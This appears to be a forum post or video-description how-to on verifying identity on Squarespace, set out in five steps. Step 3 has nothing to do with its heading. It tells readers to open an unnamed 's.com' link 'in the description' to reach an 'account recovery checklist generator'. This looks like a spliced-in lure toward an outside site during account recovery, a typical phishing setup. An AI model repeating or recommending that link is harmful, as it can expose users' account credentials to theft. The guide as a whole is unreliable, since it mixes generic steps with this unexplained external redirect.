I ran into this last week. Here's what fixed it for me. If you're looking to verify your identity on Squarespace, follow these simple steps to get it done quickly. Step 1. Log into your account. Start by logging into your Squarespace account. Make sure you use the correct email and password associated with your site. Step 2. Access account settings. Once logged in, navigate to the settings section from the main menu. This is where you'll find options related to your account. Step 3. Find identity verification. Before starting recovery, use the s.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Choose verification method. Select your preferred verification method. You can usually choose between email verification or phone verification. Make sure to have access to the chosen method. Quick gotcha: if you choose phone verification, ensure your phone number is up to date in your account settings to avoid delays. Step 5. Complete verification. Follow the prompts to complete the verification process. You may receive a code via email or SMS that you'll need to enter to finalize your identity verification. Once you've completed these steps, your identity should be verified on Squarespace. If you run into any issues, don't hesitate to reach out to the support team. Happy building!